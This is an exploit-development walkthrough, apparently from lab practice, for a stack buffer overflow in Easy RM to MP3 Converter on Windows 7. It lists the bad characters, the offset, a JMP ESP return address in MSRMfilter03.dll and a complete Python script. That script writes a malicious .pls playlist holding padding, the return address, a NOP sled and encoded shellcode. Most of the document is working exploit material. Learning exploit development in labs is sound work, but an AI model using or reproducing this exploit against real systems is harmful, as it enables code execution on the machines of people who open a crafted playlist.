Easy RM to MP3 Converter - Universal Stack Overflow Walkthrough

(Updated: )
reference Easy RM to MP3 Converter - Universal Stack Overflow
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

badchar

omitted
\x00\x0a

offset

omitted
35073

return address

!mona jmp -r esp -m MSRMfilter03.dll

MSRMfilter03.dll 0x1001b058

shellcode

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
shellcode =  b""
shellcode += b"\xba\xed\x45\xa9\xe3\xdb\xd4\xd9\x74\x24\xf4"
shellcode += b"\x5d\x33\xc9\xb1\x52\x31\x55\x12\x83\xed\xfc"
shellcode += b"\x03\xb8\x4b\x4b\x16\xbe\xbc\x09\xd9\x3e\x3d"
shellcode += b"\x6e\x53\xdb\x0c\xae\x07\xa8\x3f\x1e\x43\xfc"
shellcode += b"\xb3\xd5\x01\x14\x47\x9b\x8d\x1b\xe0\x16\xe8"
shellcode += b"\x12\xf1\x0b\xc8\x35\x71\x56\x1d\x95\x48\x99"
shellcode += b"\x50\xd4\x8d\xc4\x99\x84\x46\x82\x0c\x38\xe2"
shellcode += b"\xde\x8c\xb3\xb8\xcf\x94\x20\x08\xf1\xb5\xf7"
shellcode += b"\x02\xa8\x15\xf6\xc7\xc0\x1f\xe0\x04\xec\xd6"
shellcode += b"\x9b\xff\x9a\xe8\x4d\xce\x63\x46\xb0\xfe\x91"
shellcode += b"\x96\xf5\x39\x4a\xed\x0f\x3a\xf7\xf6\xd4\x40"
shellcode += b"\x23\x72\xce\xe3\xa0\x24\x2a\x15\x64\xb2\xb9"
shellcode += b"\x19\xc1\xb0\xe5\x3d\xd4\x15\x9e\x3a\x5d\x98"
shellcode += b"\x70\xcb\x25\xbf\x54\x97\xfe\xde\xcd\x7d\x50"
shellcode += b"\xde\x0d\xde\x0d\x7a\x46\xf3\x5a\xf7\x05\x9c"
shellcode += b"\xaf\x3a\xb5\x5c\xb8\x4d\xc6\x6e\x67\xe6\x40"
shellcode += b"\xc3\xe0\x20\x97\x24\xdb\x95\x07\xdb\xe4\xe5"
shellcode += b"\x0e\x18\xb0\xb5\x38\x89\xb9\x5d\xb8\x36\x6c"
shellcode += b"\xf1\xe8\x98\xdf\xb2\x58\x59\xb0\x5a\xb2\x56"
shellcode += b"\xef\x7b\xbd\xbc\x98\x16\x44\x57\x67\x4e\x47"
shellcode += b"\xfe\x0f\x8d\x47\x01\x6b\x18\xa1\x6b\x9b\x4d"
shellcode += b"\x7a\x04\x02\xd4\xf0\xb5\xcb\xc2\x7d\xf5\x40"
shellcode += b"\xe1\x82\xb8\xa0\x8c\x90\x2d\x41\xdb\xca\xf8"
shellcode += b"\x5e\xf1\x62\x66\xcc\x9e\x72\xe1\xed\x08\x25"
shellcode += b"\xa6\xc0\x40\xa3\x5a\x7a\xfb\xd1\xa6\x1a\xc4"
shellcode += b"\x51\x7d\xdf\xcb\x58\xf0\x5b\xe8\x4a\xcc\x64"
shellcode += b"\xb4\x3e\x80\x32\x62\xe8\x66\xed\xc4\x42\x31"
shellcode += b"\x42\x8f\x02\xc4\xa8\x10\x54\xc9\xe4\xe6\xb8"
shellcode += b"\x78\x51\xbf\xc7\xb5\x35\x37\xb0\xab\xa5\xb8"
shellcode += b"\x6b\x68\xd5\xf2\x31\xd9\x7e\x5b\xa0\x5b\xe3"
shellcode += b"\x5c\x1f\x9f\x1a\xdf\x95\x60\xd9\xff\xdc\x65"
shellcode += b"\xa5\x47\x0d\x14\xb6\x2d\x31\x8b\xb7\x67"

payload = "http://"
payload += "A" * 35073
payload += "\x58\xb0\x01\x10"
payload += "C" * 4
payload += "\x90" * 16
payload += shellcode


with open("exploit.pls", "w") as fp:
    fp.write(payload)

proof

Load->Playlist Files (*.m3u;*.pls;...)